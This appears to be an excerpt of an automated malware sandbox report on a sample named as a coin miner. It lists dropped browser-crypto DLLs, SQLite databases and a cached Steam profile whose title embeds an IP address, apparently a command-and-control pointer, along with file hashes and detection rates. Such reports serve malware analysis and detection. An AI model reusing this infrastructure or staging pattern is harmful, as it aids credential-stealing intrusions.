                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\HIDAFHDH

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                                                                          Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                                          MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                                          SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                                          SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                                          SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):685392
                                                                                                                                                                                                                                                                          Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: jNeaezBuo8.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: 74fa486WVX.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: qk9TaBBxh8.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Win64.Evo-gen.32634.31069.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: LXoASvZRu1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: nXXx6yL69w.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):608080
                                                                                                                                                                                                                                                                          Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: jNeaezBuo8.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: 74fa486WVX.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: qk9TaBBxh8.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Win64.Evo-gen.32634.31069.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: LXoASvZRu1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: nXXx6yL69w.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):450024
                                                                                                                                                                                                                                                                          Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2046288
                                                                                                                                                                                                                                                                          Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):257872
                                                                                                                                                                                                                                                                          Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):80880
                                                                                                                                                                                                                                                                          Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):805
                                                                                                                                                                                                                                                                          Entropy (8bit):5.355825766733025
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:ML9E4KlKDE4KhKiKhIE4Kx1qE4qpAE4KzeR:MxHKlYHKh3oIHKx1qHmAHKzeR
                                                                                                                                                                                                                                                                          MD5:7516119B9A2EB57F057E287C2D411DA0
                                                                                                                                                                                                                                                                          SHA1:4FF258F99431C6A96203C20E761999236B9D503C
                                                                                                                                                                                                                                                                          SHA-256:E14E24828927191906BC1603C48B8E30AD0952D20FD34EFA00ED8D5D810EA469
                                                                                                                                                                                                                                                                          SHA-512:DB7424D27FBFFB1F4D35C56B73A8D83286BF49980227496B6951267C2F0F1EB4C48A663871561427A4705F6C883A67DFAB7E4C3D040D13C2F93D57BD149A761E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199673019888[1].htm

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):33790
                                                                                                                                                                                                                                                                          Entropy (8bit):5.4364505591449435
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:sdpqm+0Iz3YAA9CWGtwfcDAXZ4VWBCW3KI8iCfJkPVoEAd2Z4VWBCW3KI8iKh2SE:sd8m+0Iz3YAA9CWGtwFXZ4VWBCW3KI8e
                                                                                                                                                                                                                                                                          MD5:5C978DC33DB6D33FCA06F996902CC557
                                                                                                                                                                                                                                                                          SHA1:A6EA7B5AC21D4F4B472617608B879B8A739AF40D
                                                                                                                                                                                                                                                                          SHA-256:3DB199A8FD77D8CA57CCB3A1BACBC42DD8DEC8D103F2E9C045FE8CB863328F3C
                                                                                                                                                                                                                                                                          SHA-512:60A8E93D8B9C33FB8C0D2AED6CEDCC5E2D1276C128F1226B14D738D0591474179F39C8463377E5C07AE5BF3796722D9F4C56F28E9FC351D3B5B47526ED6FED35
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: ve74r https://37.27.87.155|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link hre

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2459136
                                                                                                                                                                                                                                                                          Entropy (8bit):6.052474106868353
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                                                                                                                                                                                                          MD5:90E744829865D57082A7F452EDC90DE5
                                                                                                                                                                                                                                                                          SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                                                                                                                                                                                                          SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                                                                                                                                                                                                          SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):685392
                                                                                                                                                                                                                                                                          Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):608080
                                                                                                                                                                                                                                                                          Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):450024
                                                                                                                                                                                                                                                                          Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2046288
                                                                                                                                                                                                                                                                          Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
